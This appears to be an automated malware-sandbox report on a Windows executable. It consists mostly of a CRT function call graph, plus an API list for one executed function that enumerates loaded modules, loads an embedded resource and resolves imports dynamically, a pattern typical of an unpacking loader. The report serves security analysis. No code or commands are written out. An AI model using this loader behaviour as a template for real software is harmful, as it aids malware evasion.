40b6b5 ___freetlocinfo 62 API calls 13276->13277 13278 4177b4 13277->13278 13279 40b6b5 ___freetlocinfo 62 API calls 13278->13279 13280 4177bf 13279->13280 13281 40b6b5 ___freetlocinfo 62 API calls 13280->13281 13282 4177ca 13281->13282 13283 40b6b5 ___freetlocinfo 62 API calls 13282->13283 13284 4177d5 13283->13284 13285 40b6b5 ___freetlocinfo 62 API calls 13284->13285 13286 4177e0 13285->13286 13287 40b6b5 ___freetlocinfo 62 API calls 13286->13287 13288 4177eb 13287->13288 13289 40b6b5 ___freetlocinfo 62 API calls 13288->13289 13289->13203 13290->13133 13292 413f1f 13291->13292 13294 413e6d _memset 13291->13294 13296 40ce09 __cftog_l 5 API calls 13292->13296 13301 417625 13294->13301 13298 413fca 13296->13298 13298->13092 13300 417426 ___crtLCMapStringA 97 API calls 13300->13292 13302 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13301->13302 13303 417638 13302->13303 13311 41746b 13303->13311 13306 417426 13307 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13306->13307 13308 417439 13307->13308 13377 417081 13308->13377 13312 4174b7 13311->13312 13313 41748c GetStringTypeW 13311->13313 13314 4174a4 13312->13314 13316 41759e 13312->13316 13313->13314 13315 4174ac GetLastError 13313->13315 13317 4174f0 MultiByteToWideChar 13314->13317 13334 417598 13314->13334 13315->13312 13339 417a20 GetLocaleInfoA 13316->13339 13322 41751d 13317->13322 13317->13334 13319 40ce09 __cftog_l 5 API calls 13321 413eda 13319->13321 13321->13306 13325 417532 _memset __crtGetStringTypeA_stat 13322->13325 13326 40b84d _malloc 62 API calls 13322->13326 13323 4175ef GetStringTypeA 13324 41760a 13323->13324 13323->13334 13329 40b6b5 ___freetlocinfo 62 API calls 13324->13329 13328 41756b MultiByteToWideChar 13325->13328 13325->13334 13326->13325 13331 417581 GetStringTypeW 13328->13331 13332 417592 13328->13332 13329->13334 13331->13332 13335 4147ae 13332->13335 13334->13319 13336 4147ba 13335->13336 13337 4147cb 13335->13337 13336->13337 13338 40b6b5 ___freetlocinfo 62 API calls 13336->13338 13337->13334 13338->13337 13340 417a53 13339->13340 13341 417a4e 13339->13341 13370 416f54 13340->13370 13343 40ce09 __cftog_l 5 API calls 13341->13343 13344 4175c2 13343->13344 13344->13323 13344->13334 13345 417a69 13344->13345 13346 417aa9 GetCPInfo 13345->13346 13362 417b33 13345->13362 13347 417ac0 13346->13347 13348 417b1e MultiByteToWideChar 13346->13348 13347->13348 13350 417ac6 GetCPInfo 13347->13350 13353 417ad9 _strlen 13348->13353 13348->13362 13349 40ce09 __cftog_l 5 API calls 13351 4175e3 13349->13351 13350->13348 13352 417ad3 13350->13352 13351->13323 13351->13334 13352->13348 13352->13353 13354 40b84d _malloc 62 API calls 13353->13354 13358 417b0b _memset __crtGetStringTypeA_stat 13353->13358 13354->13358 13355 417b68 MultiByteToWideChar 13356 417b80 13355->13356 13357 417b9f 13355->13357 13360 417ba4 13356->13360 13361 417b87 WideCharToMultiByte 13356->13361 13359 4147ae __freea 62 API calls 13357->13359 13358->13355 13358->13362 13359->13362 13363 417bc3 13360->13363 13364 417baf WideCharToMultiByte 13360->13364 13361->13357 13362->13349 13365 411cba __calloc_crt 62 API calls 13363->13365 13364->13357 13364->13363 13366 417bcb 13365->13366 13366->13357 13367 417bd4 WideCharToMultiByte 13366->13367 13367->13357 13368 417be6 13367->13368 13369 40b6b5 ___freetlocinfo 62 API calls 13368->13369 13369->13357 13373 41a354 13370->13373 13374 41a36d 13373->13374 13375 41a125 strtoxl 86 API calls 13374->13375 13376 416f65 13375->13376 13376->13341 13378 4170a2 LCMapStringW 13377->13378 13381 4170bd 13377->13381 13379 4170c5 GetLastError 13378->13379 13378->13381 13379->13381 13380 4172bb 13383 417a20 ___ansicp 86 API calls 13380->13383 13381->13380 13382 417117 13381->13382 13384 417130 MultiByteToWideChar 13382->13384 13407 4172b2 13382->13407 13385 4172e3 13383->13385 13390 41715d 13384->13390 13384->13407 13388 4173d7 LCMapStringA 13385->13388 13389 4172fc 13385->13389 13385->13407 13386 40ce09 __cftog_l 5 API calls 13387 413efa 13386->13387 13387->13300 13423 417333 13388->13423 13391 417a69 ___convertcp 69 API calls 13389->13391 13394 40b84d _malloc 62 API calls 13390->13394 13401 417176 __crtGetStringTypeA_stat 13390->13401 13395 41730e 13391->13395 13392 4171ae MultiByteToWideChar 13396 4171c7 LCMapStringW 13392->13396 13418 4172a9 13392->13418 13393 4173fe 13404 40b6b5 ___freetlocinfo 62 API calls 13393->13404 13393->13407 13394->13401 13398 417318 LCMapStringA 13395->13398 13395->13407 13400 4171e8 13396->13400 13396->13418 13397 40b6b5 ___freetlocinfo 62 API calls 13397->13393 13410 41733a 13398->13410 13398->13423 13399 4147ae __freea 62 API calls 13399->13407 13402 4171f1 13400->13402 13409 41721a 13400->13409 13401->13392 13401->13407 13406 417203 LCMapStringW 13402->13406 13402->13418 13403 417235 __crtGetStringTypeA_stat 13408 417269 LCMapStringW 13403->13408 13403->13418 13404->13407 13405 41734b _memset __crtGetStringTypeA_stat 13416 417389 LCMapStringA 13405->13416 13405->13423 13406->13418 13407->13386 13411 4172a3 13408->13411 13414 417281 WideCharToMultiByte 13408->13414 13409->13403 13413 40b84d _malloc 62 API calls 13409->13413 13410->13405 13412 40b84d _malloc 62 API calls 13410->13412 13415 4147ae __freea 62 API calls 13411->13415 13412->13405 13413->13403 13414->13411 13415->13418 13419 4173a5 13416->13419 13420 4173a9 13416->13420 13418->13399 13422 4147ae __freea 62 API calls 13419->13422 13421 417a69 ___convertcp 69 API calls 13420->13421 13421->13419 13422->13423 13423->13393 13423->13397 13424->13095 13426 41358c 13425->13426 13427 41046e __encode_pointer 6 API calls 13426->13427 13428 4135a4 13426->13428 13427->13426 13428->12554 13432 40d281 13429->13432 13431 40d2ca 13431->12556 13433 40d28d __sopen_helper 13432->13433 13440 40e806 13433->13440 13439 40d2ae __sopen_helper 13439->13431 13441 40d6e0 __lock 62 API calls 13440->13441 13442 40d292 13441->13442 13443 40d196 13442->13443 13444 4104e9 __decode_pointer 6 API calls 13443->13444 13445 40d1aa 13444->13445 13446 4104e9 __decode_pointer 6 API calls 13445->13446 13447 40d1ba 13446->13447 13457 40d23d 13447->13457 13463 40e56a 13447->13463 13449 40d224 13450 41046e __encode_pointer 6 API calls 13449->13450 13451 40d232 13450->13451 13454 41046e __encode_pointer 6 API calls 13451->13454 13452 40d1fc 13456 411d06 __realloc_crt 72 API calls 13452->13456 13452->13457 13458 40d212 13452->13458 13453 40d1d8 13453->13449 13453->13452 13476 411d06 13453->13476 13454->13457 13456->13458 13460 40d2b7 13457->13460 13458->13457 13459 41046e __encode_pointer 6 API calls 13458->13459 13459->13449 13525 40e80f 13460->13525 13464 40e576 __sopen_helper 13463->13464 13465 40e5a3 13464->13465 13466 40e586 13464->13466 13468 40e5e4 HeapSize 13465->13468 13470 40d6e0 __lock 62 API calls 13465->13470 13467 40bfc1 __read_nolock 62 API calls 13466->13467 13469 40e58b 13467->13469 13473 40e59b __sopen_helper 13468->13473 13471 40e744 __read_nolock 6 API calls 13469->13471 13472 40e5b3 ___sbh_find_block 13470->13472 13471->13473 13481 40e604 13472->13481 13473->13453 13478 411d0f 13476->13478 13479 411d4e 13478->13479 13480 411d2f Sleep 13478->13480 13485 40e34f 13478->13485 13479->13452 13480->13478 13484 40d606 LeaveCriticalSection 13481->13484 13483 40e5df 13483->13468 13483->13473 13484->13483 13486 40e35b __sopen_helper 13485->13486 13487 40e370 13486->13487 13488 40e362 13486->13488 13490 40e383 13487->13490 13491 40e377 13487->13491 13489 40b84d _malloc 62 API calls 13488->13489 13506 40e36a __dosmaperr __sopen_helper 13489->13506 13498 40e4f5 13490->13498 13520 40e390 _realloc ___sbh_resize_block ___sbh_find_block 13490->13520 13492 40b6b5 ___freetlocinfo 62 API calls 13491->13492 13492->13506 13493 40e528 13494 40d2e3 _realloc 6 API calls 13493->13494 13497 40e52e 13494->13497 13495 40d6e0 __lock 62 API calls 13495->13520 13496 40e4fa HeapReAlloc 13496->13498 13496->13506 13499 40bfc1 __read_nolock 62 API calls 13497->13499 13498->13493 13498->13496 13500 40e54c 13498->13500 13501 40d2e3 _realloc 6 API calls 13498->13501 13503 40e542 13498->13503 13499->13506 13502 40bfc1 __read_nolock 62 API calls 13500->13502 13500->13506 13501->13498 13504 40e555 GetLastError 13502->13504 13507 40bfc1 __read_nolock 62 API calls 13503->13507 13504->13506 13506->13478 13509 40e4c3 13507->13509 13508 40e41b HeapAlloc 13508->13520 13509->13506 13511 40e4c8 GetLastError 13509->13511 13510 40e470 HeapReAlloc 13510->13520 13511->13506 13512 40def2 ___sbh_alloc_block 5 API calls 13512->13520 13513 40e4db 13513->13506 13516 40bfc1 __read_nolock 62 API calls 13513->13516 13514 40d2e3 _realloc 6 API calls 13514->13520 13515 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 13515->13520 13517 40e4e8 13516->13517 13517->13504 13517->13506 13518 40e4be 13519 40bfc1 __read_nolock 62 API calls 13518->13519 13519->13509 13520->13493 13520->13495 13520->13506 13520->13508 13520->13510 13520->13512 13520->13513 13520->13514 13520->13515 13520->13518 13521 40e493 13520->13521 13524 40d606 LeaveCriticalSection 13521->13524 13523 40e49a 13523->13520 13524->13523 13528 40d606 LeaveCriticalSection 13525->13528 13527 40d2bc 13527->13439 13528->13527 13532 40b9aa __sopen_helper _strnlen 13529->13532 13530 40b9b8 13531 40bfc1 __read_nolock 62 API calls 13530->13531 13533 40b9bd 13531->13533 13532->13530 13535 40b9ec 13532->13535 13534 40e744 __read_nolock 6 API calls 13533->13534 13539 40b9cd __sopen_helper 13534->13539 13536 40d6e0 __lock 62 API calls 13535->13536 13537 40b9f3 13536->13537 13586 40b917 13537->13586 13539->12560 13543 4017cc _realloc 13542->13543 13543->12564 13546 40af70 13544->13546 13545 40b84d _malloc 62 API calls 13545->13546 13546->13545 13547 40af8a 13546->13547 13548 40d2e3 _realloc 6 API calls 13546->13548 13551 40af8c std::bad_alloc::bad_alloc 13546->13551 13547->12570 13548->13546 13549 40afb2 13800 40af49 13549->13800 13551->13549 13553 40d2bd __cinit 73 API calls 13551->13553 13553->13549 13555 40afca 13557 401903 lstrlenA 13556->13557 13558 4018fc 13556->13558 13812 4017e0 13557->13812 13558->12592 13561 401940 GetLastError 13563 40194b MultiByteToWideChar 13561->13563 13565 40198d 13561->13565 13562 401996 13562->12592 13564 4017e0 77 API calls 13563->13564 13566 401970 MultiByteToWideChar 13564->13566 13565->13562 13828 401030 GetLastError 13565->13828 13566->13565 13569 40af66 74 API calls 13568->13569 13570 40187c 13569->13570 13571 401885 #2 13570->13571 13572 4018a4 13570->13572 13571->13572 13572->12594 13574 40231a #24 13573->13574 13574->12601 13576 4019aa InterlockedDecrement 13575->13576 13581 4019df #9 13575->13581 13577 4019b8 13576->13577 13576->13581 13578 4019c2 #6 13577->13578 13579 4019c9 13577->13579 13577->13581 13578->13579 13837 40aec0 13579->13837 13581->12609 13583 401571 13582->13583 13585 401582 13582->13585 13843 40afe0 13583->13843 13585->12572 13587 40b92c 13586->13587 13588 40b930 13586->13588 13592 40ba18 13587->13592 13588->13587 13590 40b942 _strlen 13588->13590 13595 40eeab 13588->13595 13590->13587 13605 40edfb 13590->13605 13799 40d606 LeaveCriticalSection 13592->13799 13594 40ba1f 13594->13539 13598 40eec6 13595->13598 13603 40ef2b 13595->13603 13596 40eecc WideCharToMultiByte 13596->13598 13596->13603 13597 411cba __calloc_crt 62 API calls 13597->13598 13598->13596 13598->13597 13599 40eeef WideCharToMultiByte 13598->13599 13598->13603 13604 40b6b5 ___freetlocinfo 62 API calls 13598->13604 13608 414d44 13598->13608 13599->13598 13600 40ef37 13599->13600 13601 40b6b5 ___freetlocinfo 62 API calls 13600->13601 13601->13603 13603->13590 13604->13598 13700 40ed0d 13605->13700 13609 414d76 13608->13609 13610 414d59 13608->13610 13612 414dd4 13609->13612 13654 417e7e 13609->13654 13611 40bfc1 __read_nolock 62 API calls 13610->13611 13613 414d5e 13611->13613 13614 40bfc1 __read_nolock 62 API calls 13612->13614 13616 40e744 __read_nolock 6 API calls 13613->13616 13634 414d6e 13614->13634 13616->13634 13618 414db5 13620 414e12 13618->13620 13621 414de7 13618->13621 13622 414dcb 13618->13622 13620->13634 13665 414c98 13620->13665 13624 411c75 __malloc_crt 62 API calls 13621->13624 13621->13634 13625 40eeab ___wtomb_environ 119 API calls 13622->13625 13627 414df7 13624->13627 13628 414dd0 13625->13628 13627->13620 13627->13634 13635 411c75 __malloc_crt 62 API calls 13627->13635 13628->13612 13628->13620 13629 414e8f 13630 414f7a 13629->13630 13636 414e98 13629->13636 13633 40b6b5 ___freetlocinfo 62 API calls 13630->13633 13631 414e41 13632 40b6b5 ___freetlocinfo 62 API calls 13631->13632 13639 414e4b 13632->13639 13633->13634 13634->13598 13635->13620 13636->13634 13637 411d54 __recalloc_crt 73 API calls 13636->13637 13640 414e51 _strlen 13637->13640 13638 414f5e 13638->13634 13642 40b6b5 ___freetlocinfo 62 API calls 13638->13642 13639->13640 13669 411d54 13639->13669 13640->13634 13640->13638 13643 411cba __calloc_crt 62 API calls 13640->13643 13642->13634 13644 414efb _strlen 13643->13644 13644->13638 13645 40ef42 _strcpy_s 62 API calls 13644->13645 13646 414f14 13645->13646 13647 414f28 SetEnvironmentVariableA 13646->13647 13648 40e61c __invoke_watson 10 API calls 13646->13648 13649 414f49 13647->13649 13650 414f52 13647->13650 13651 414f25 13648->13651 13652 40bfc1 __read_nolock 62 API calls 13649->13652 13653 40b6b5 ___freetlocinfo 62 API calls 13650->13653 13651->13647 13652->13650 13653->13638 13674 417dc2 13654->13674 13656 414d89 13656->13612 13656->13618 13657 414cea 13656->13657 13658 414cfb 13657->13658 13663 414d3b 13657->13663 13659 411cba __calloc_crt 62 API calls 13658->13659 13660 414d12 13659->13660 13661 414d24 13660->13661 13662 40e79a __amsg_exit 62 API calls 13660->13662 13661->13663 13681 417d6d 13661->13681 13662->13661 13663->13618 13668 414ca6 13665->13668 13666 414ccd 13666->13629 13666->13631 13667 40edfb __fassign 106 API calls 13667->13668 13668->13666 13668->13667 13671 411d5d 13669->13671 13672 411da0 13671->13672 13673 411d81 Sleep 13671->13673 13689 40b783 13671->13689 13672->13640 13673->13671 13675 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13674->13675 13676 417dd6 13675->13676 13677 40bfc1 __read_nolock 62 API calls 13676->13677 13680 417df4 __mbschr_l 13676->13680 13678 417de4 13677->13678 13679 40e744 __read_nolock 6 API calls 13678->13679 13679->13680 13680->13656 13682 417d7e _strlen 13681->13682 13688 417d7a 13681->13688 13683 40b84d _malloc 62 API calls 13682->13683 13684 417d91 13683->13684 13685 40ef42 _strcpy_s 62 API calls 13684->13685 13684->13688 13686 417da3 13685->13686 13687 40e61c __invoke_watson 10 API calls 13686->13687 13686->13688 13687->13688 13688->13661 13690 40b792 13689->13690 13691 40b7ba 13689->13691 13690->13691 13693 40b79e 13690->13693 13692 40b7cf 13691->13692 13694 40e56a __msize 63 API calls 13691->13694 13695 40e34f _realloc 71 API calls 13692->13695 13696 40bfc1 __read_nolock 62 API calls 13693->13696 13694->13692 13699 40b7b3 _memset 13695->13699 13697 40b7a3 13696->13697 13698 40e744 __read_nolock 6 API calls 13697->13698 13698->13699 13699->13671 13701 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13700->13701 13702 40ed21 13701->13702 13703 40ed42 13702->13703 13704 40ed75 13702->13704 13713 40ed2a 13702->13713 13705 40bfc1 __read_nolock 62 API calls 13703->13705 13706 40ed99 13704->13706 13707 40ed7f 13704->13707 13708 40ed47 13705->13708 13710 40eda1 13706->13710 13711 40edb5 13706->13711 13709 40bfc1 __read_nolock 62 API calls 13707->13709 13712 40e744 __read_nolock 6 API calls 13708->13712 13714 40ed84 13709->13714 13718 414b9e 13710->13718 13738 414b5c 13711->13738 13712->13713 13713->13590 13717 40e744 __read_nolock 6 API calls 13714->13717 13717->13713 13719 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13718->13719 13720 414bb2 13719->13720 13721 414bd3 13720->13721 13722 414c06 13720->13722 13734 414bbb 13720->13734 13723 40bfc1 __read_nolock 62 API calls 13721->13723 13724 414c10 13722->13724 13725 414c2a 13722->13725 13726 414bd8 13723->13726 13727 40bfc1 __read_nolock 62 API calls 13724->13727 13728 414c34 13725->13728 13729 414c49 13725->13729 13730 40e744 __read_nolock 6 API calls 13726->13730 13731 414c15 13727->13731 13743 417c1d 13728->13743 13733 414b5c ___crtCompareStringA 95 API calls 13729->13733 13730->13734 13735 40e744 __read_nolock 6 API calls 13731->13735 13736 414c63 13733->13736 13734->13713 13735->13734 13736->13734 13737 40bfc1 __read_nolock 62 API calls 13736->13737 13737->13734 13739 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13738->13739 13740 414b6f 13739->13740 13759 4147ec 13740->13759 13744 417c33 13743->13744 13754 417c58 ___ascii_strnicmp 13743->13754 13745 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13744->13745 13746 417c3e 13745->13746 13747 417c43 13746->13747 13748 417c78 13746->13748 13749 40bfc1 __read_nolock 62 API calls 13747->13749 13750 417c82 13748->13750 13758 417caa 13748->13758 13751 417c48 13749->13751 13753 40bfc1 __read_nolock 62 API calls 13750->13753 13752 40e744 __read_nolock 6 API calls 13751->13752 13752->13754 13755 417c87 13753->13755 13754->13734 13756 40e744 __read_nolock 6 API calls 13755->13756 13756->13754 13757 4168fc 97 API calls __tolower_l 13757->13758 13758->13754 13758->13757 13760 414818 CompareStringW 13759->13760 13762 41482f strncnt 13759->13762 13761 41483b GetLastError 13760->13761 13760->13762 13761->13762 13764 414a95 13762->13764 13768 4148a4 13762->13768 13778 414881 13762->13778 13763 40ce09 __cftog_l 5 API calls 13765 414b5a 13763->13765 13766 417a20 ___ansicp 86 API calls 13764->13766 13765->13713 13767 414abb 13766->13767 13770 414b1c CompareStringA 13767->13770 13772 417a69 ___convertcp 69 API calls 13767->13772 13767->13778 13769 414962 MultiByteToWideChar 13768->13769 13771 4148e6 GetCPInfo 13768->13771 13768->13778 13769->13778 13780 414982 13769->13780 13773 414b3a 13770->13773 13770->13778 13774 4148f7 13771->13774 13771->13778 13775 414ae0 13772->13775 13776 40b6b5 ___freetlocinfo 62 API calls 13773->13776 13774->13769 13774->13778 13775->13778 13784 417a69 ___convertcp 69 API calls 13775->13784 13777 414b40 13776->13777 13781 40b6b5 ___freetlocinfo 62 API calls 13777->13781 13778->13763 13779 4149d9 MultiByteToWideChar 13782 4149f2 MultiByteToWideChar 13779->13782 13783 414a83 13779->13783 13785 40b84d _malloc 62 API calls 13780->13785 13790 41499f __crtGetStringTypeA_stat 13780->13790 13781->13778 13782->13783 13793 414a09 13782->13793 13787 4147ae __freea 62 API calls 13783->13787 13786 414b01 13784->13786 13785->13790 13788 414b16 13786->13788 13789 414b0a 13786->13789 13787->13778 13788->13770 13791 40b6b5 ___freetlocinfo 62 API calls 13789->13791 13790->13778 13790->13779 13791->13778 13792 414a53 MultiByteToWideChar 13794 414a66 CompareStringW 13792->13794 13795 414a7d 13792->13795 13796 414a1f __crtGetStringTypeA_stat 13793->13796 13797 40b84d _malloc 62 API calls 13793->13797 13794->13795 13798 4147ae __freea 62 API calls 13795->13798 13796->13783 13796->13792 13797->13796 13798->13783 13799->13594 13806 40d0f5 13800->13806 13803 40cd39 13804 40cd6e RaiseException 13803->13804 13805 40cd62 13803->13805 13804->13555 13805->13804 13807 40d115 _strlen 13806->13807 13808 40af59 13806->13808 13807->13808 13809 40b84d _malloc 62 API calls 13807->13809 13808->13803 13810 40d128 13809->13810 13810->13808 13811 40ef42 _strcpy_s 62 API calls 13810->13811 13811->13808 13813 4017f3 13812->13813 13814 4017e9 EntryPoint 13812->13814 13815 401805 13813->13815 13816 4017fb EntryPoint 13813->13816 13814->13813 13817 401818 13815->13817 13818 40180e EntryPoint 13815->13818 13816->13815 13819 40183e 13817->13819 13820 40b783 __recalloc 72 API calls 13817->13820 13826 401844 13817->13826 13818->13817 13821 40b6b5 ___freetlocinfo 62 API calls 13819->13821 13823 40182d 13820->13823 13821->13826 13823->13826 13827 401834 EntryPoint 13823->13827 13824 40186d MultiByteToWideChar 13824->13561 13824->13562 13825 40184e EntryPoint 13825->13826 13826->13824 13826->13825 13830 40b743 13826->13830 13827->13819 13829 401044 EntryPoint 13828->13829 13831 40e231 __calloc_impl 62 API calls 13830->13831 13832 40b75d 13831->13832 13833 40b779 13832->13833 13834 40bfc1 __read_nolock 62 API calls 13832->13834 13833->13826 13835 40b770 13834->13835 13835->13833 13836 40bfc1 __read_nolock 62 API calls 13835->13836 13836->13833 13838 40b6b5 __sopen_helper 13837->13838 13839 40b73d __sopen_helper 13838->13839 13840 40b714 HeapFree 13838->13840 13839->13581 13840->13839 13841 40b727 13840->13841 13842 40bfc1 __read_nolock 62 API calls 13841->13842 13842->13839 13844 40aff8 13843->13844 13845 40b027 13844->13845 13846 40b01f __VEC_memcpy 13844->13846 13845->13585 13846->13845 13848 4104e0 _raise 6 API calls 13847->13848 13849 40ea5c __init_pointers __initp_misc_winsig 13848->13849 13864 41393d 13849->13864 13852 41046e __encode_pointer 6 API calls 13853 40ea98 13852->13853 13853->12633 13855 40d56f 13854->13855 13856 40d59d 13855->13856 13857 41389c __ioinit InitializeCriticalSectionAndSpinCount 13855->13857 13856->12623 13856->12643 13857->13855 13859 4105a2 13858->13859 13860 4105ae 13858->13860 13861 4104e9 __decode_pointer 6 API calls 13859->13861 13862 4105d0 13860->13862 13863 4105c2 TlsFree 13860->13863 13861->13860 13862->13862 13863->13862 13865 41046e __encode_pointer 6 API calls 13864->13865 13866 40ea8e 13865->13866 13866->13852 13868 41265c 13867->13868 13871 4126c9 13868->13871 13873 416836 13868->13873 13870 4127c7 13870->12665 13870->12667 13871->13870 13872 416836 72 API calls _parse_cmdline 13871->13872 13872->13871 13876 4167e3 13873->13876 13877 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13876->13877 13878 4167f6 13877->13878 13878->13868 13880 40e8ea __sopen_helper 13879->13880 13881 40d6e0 __lock 62 API calls 13880->13881 13882 40e8f1 13881->13882 13884 4104e9 __decode_pointer 6 API calls 13882->13884 13888 40e9aa __initterm 13882->13888 13886 40e928 13884->13886 13886->13888 13890 4104e9 __decode_pointer 6 API calls 13886->13890 13887 40e9f2 __sopen_helper 13887->12672 13896 40e9f5 13888->13896 13895 40e93d 13890->13895 13891 40e9e9 13892 40e7ee _malloc 3 API calls 13891->13892 13892->13887 13893 4104e9 6 API calls __decode_pointer 13893->13895 13894 4104e0 6 API calls _raise 13894->13895 13895->13888 13895->13893 13895->13894 13897 40e9fb 13896->13897 13899 40e9d6 13896->13899 13901 40d606 LeaveCriticalSection 13897->13901 13899->13887 13900 40d606 LeaveCriticalSection 13899->13900 13900->13891 13901->13899

                                                                                                                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                          Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 25 401c85-401c8d 19->25 20->21 22 401cb0-401cce call 401650 21->22 23 401c9c-401caf CloseHandle 21->23 32 401cd0-401cd4 22->32 25->14 25->20 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 42 401cf5-401cf7 35->42 40 401cda-401ce0 36->40 41 401cec-401cee 36->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->35 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 62 401d50-401d52 60->62 63 401d36-401d38 60->63 67 401d55-401d57 62->67 65 401d3a-401d40 63->65 66 401d4c-401d4e 63->66 65->62 70 401d42-401d4a 65->70 66->67 67->23 71 401d5d-401d7b call 401650 67->71 70->60 70->66 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 #8 call 401870 #8 call 4018d0 103->106 114 4022c3-40232a call 4018d0 #15 #23 call 40b350 #24 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 #16 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 #411 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 #9 * 2 call 4019a0 142->144 143->144 146 40241c-40242c #9 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                                                                                                                                                                                                                                          • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                                                                                                                                                                                                                                                                                                          • Module32Next.KERNEL32(00000000,?,?,?,00000008,00000000), ref: 00401D02
                                                                                                                                                                                                                                                                                                                                                                                                                          • Module32Next.KERNEL32(00000000,?,?,?,00000000,?,?,?,00000008,00000000), ref: 00401DB6
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000000,00000008,00000000), ref: 00401E90
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000434000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000001.1541928140.0000000000548000.00000040.00000001.00020000.00000000.sdmpDownload File
